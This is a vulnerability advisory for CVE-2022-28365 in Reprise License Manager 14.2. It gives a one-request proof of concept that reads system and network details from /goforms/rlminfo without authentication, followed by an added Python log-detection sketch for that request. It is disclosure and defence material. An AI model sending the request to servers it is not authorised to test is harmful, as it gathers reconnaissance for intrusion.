Giulia Melotti Garibaldi

giulia@homepage:~$ cat CVE-2022-28365.txt
#Product: RLM 14.2
#Vendor: Reprise Software
#CVE ID: CVE-2022-28365
#Vulnerability Title: Unauthenticated Information Disclosure
#Severity: Low
#Author(s): Giulia Melotti Garibaldi
#Date: 2022-03-29

#####################################################

Introduction:

Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.
The disclosed information covers software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.

#####################################################

Vulnerability PoC:

#GET http://HOST:5054/goforms/rlminfo HTTP/1.1
#Host: HOST:5054
#Connection: keep-alive
#Content-Length: 0
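
Detection sketch (added example, not part of the original advisory and not vendor code): it flags requests to /goforms/rlminfo that come from outside an admin network. It assumes a reverse proxy or sensor in front of RLM that writes combined-format access logs. The admin network, the sample log lines and all function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumption: a proxy or sensor in front of RLM writes combined-format access logs.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ENDPOINT = "/goforms/rlminfo"
# Hypothetical admin network allowed to view license-server status.
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '10.20.0.15 - - [29/Mar/2022:09:12:01 +0000] "GET /goforms/rlminfo HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [29/Mar/2022:09:14:37 +0000] "GET http://rlm.example.internal:5054/goforms/rlminfo HTTP/1.1" 200 4312 "-" "curl/7.81.0"',
    '192.0.2.44 - - [29/Mar/2022:09:14:40 +0000] "GET /index.html HTTP/1.1" 200 1021 "-" "curl/7.81.0"',
    '198.51.100.7 - - [29/Mar/2022:10:02:11 +0000] "GET /goforms/%72lminfo?x=1 HTTP/1.1" 200 4312 "-" "python-requests/2.27"',
]

def normalized_path(target):
    """Reduce a request target to a comparable path."""
    # Drop scheme and authority of absolute-form targets, as used in the PoC.
    target = re.sub(r"^[A-Za-z][A-Za-z0-9+.-]*://[^/?#]*", "", target)
    path = unquote(re.split(r"[?#]", target, maxsplit=1)[0])
    # Collapse repeated slashes; fold case so the match errs toward alerting.
    return re.sub(r"/+", "/", path).rstrip("/").lower()

def is_admin(src, admin_nets):
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:  # hostname or garbage in the source field
        return False
    return any(addr in net for net in admin_nets)

def find_rlminfo_requests(lines, admin_nets=ADMIN_NETS):
    """Return (timestamp, source, status) for endpoint requests from non-admin sources."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalized_path(m["target"]) != ENDPOINT:
            continue
        if not is_admin(m["src"], admin_nets):
            hits.append((m["ts"], m["src"], int(m["status"])))
    return hits

if __name__ == "__main__":
    print(find_rlminfo_requests(SAMPLE_LOG))
```

A 200 status on a hit means the information page was served to that source; other statuses are still worth reviewing as probes.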

